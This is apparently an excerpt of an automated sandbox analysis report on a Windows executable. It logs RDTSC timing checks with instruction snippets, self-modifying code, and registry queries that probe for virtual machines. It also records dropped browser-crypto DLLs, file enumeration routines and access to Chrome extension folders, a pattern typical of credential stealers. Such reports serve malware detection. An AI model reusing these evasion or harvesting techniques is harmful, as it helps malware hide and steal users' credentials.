Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9472C second address: C94732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94732 second address: C9473A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9473A second address: C9473E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94C3B second address: C94C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C95004 second address: C9500E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF2D4EC6CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9500E second address: C95012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C961FE second address: C96216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF2D4EC6CB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96216 second address: C9621A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9CB95 second address: C9CB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9EDCB second address: C9EDE7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2D4D13D5Eh 0x00000008 jmp 00007FF2D4D13D52h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9D68 second address: CA9D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CB5h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA98D8 second address: CA98E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF2D4D13D46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA98E4 second address: CA98E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9A4E second address: CA9A62 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnp 00007FF2D4D13D46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9A62 second address: CA9A78 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2D4EC6CA6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007FF2D4EC6CA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFAE9 second address: CAFAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D4Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB44BD second address: CB44CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2D4EC6CADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB123 second address: CCB129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB129 second address: CCB12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB12D second address: CCB162 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FF2D4D13D4Ch 0x00000010 jbe 00007FF2D4D13D46h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007FF2D4D13D66h 0x0000001e push ebx 0x0000001f jmp 00007FF2D4D13D50h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB2E9 second address: CCB2ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB2ED second address: CCB311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FF2D4D13D59h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB45C second address: CCB462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB5A5 second address: CCB5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB6ED second address: CCB6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCB6F1 second address: CCB6FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FF2D4D13D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC10B second address: CCC111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC111 second address: CCC137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2D4D13D58h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC137 second address: CCC159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jno 00007FF2D4EC6CBBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCC159 second address: CCC172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D51h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6FB7 second address: BE6FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF4C5 second address: CDF4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF4C9 second address: CDF4D7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2D4EC6CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF4D7 second address: CDF4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE074 second address: CEE07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE07C second address: CEE082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE082 second address: CEE086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD6FE second address: CFD714 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2D4D13D50h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD714 second address: CFD76B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2D4EC6CACh 0x00000008 ja 00007FF2D4EC6CA6h 0x0000000e jc 00007FF2D4EC6CA6h 0x00000014 popad 0x00000015 jno 00007FF2D4EC6CBDh 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e jmp 00007FF2D4EC6CADh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF2D4EC6CAAh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD76B second address: CFD76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD76F second address: CFD77F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FF2D4EC6CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD8F2 second address: CFD8F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD8F6 second address: CFD906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDA96 second address: CFDA9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDBF4 second address: CFDBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDBF8 second address: CFDC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FF2D4D13D46h 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDC0E second address: CFDC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFDC16 second address: CFDC25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE031 second address: CFE048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CB3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE048 second address: CFE04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE42D second address: CFE433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE596 second address: CFE5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D51h 0x00000007 jmp 00007FF2D4D13D4Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFE5C0 second address: CFE5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02C7E second address: D02CB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2D4D13D59h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02CB3 second address: D02CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02CB9 second address: D02CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D030DF second address: D030E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D030E3 second address: D03115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF2D4D13D4Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03115 second address: D03124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0462A second address: D04636 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2D4D13D4Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0650F second address: D06513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B02DE second address: 51B030C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF2D4D13D53h 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B030C second address: 51B0334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 26E03BD9h 0x00000012 mov eax, 4E0FBC95h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0334 second address: 51B034A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B034A second address: 51B034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B034E second address: 51B0369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0369 second address: 51B036F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B036F second address: 51B0373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0373 second address: 51B0389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2D4EC6CAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B044D second address: 51B0453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0453 second address: 51B0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0459 second address: 51B045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0AE8 second address: 51B0B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FF2D4EC6CB2h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop ecx 0x00000018 call 00007FF2D4EC6CB9h 0x0000001d pop esi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B28 second address: 51B0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B2E second address: 51B0B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B32 second address: 51B0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B36 second address: 51B0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF2D4EC6CB1h 0x00000012 pop ecx 0x00000013 mov edx, 3AA8C524h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B5B second address: 51B0B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B61 second address: 51B0B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2D4EC6CB7h 0x00000013 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C21CE4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CA3C03 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00824910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00824910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0081DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0081E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00823EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00823EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0081F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008116D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0081BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_008238B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0081ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00824570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00824570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0081DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00811160 GetSystemInfo,ExitProcess,

0_2_00811160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

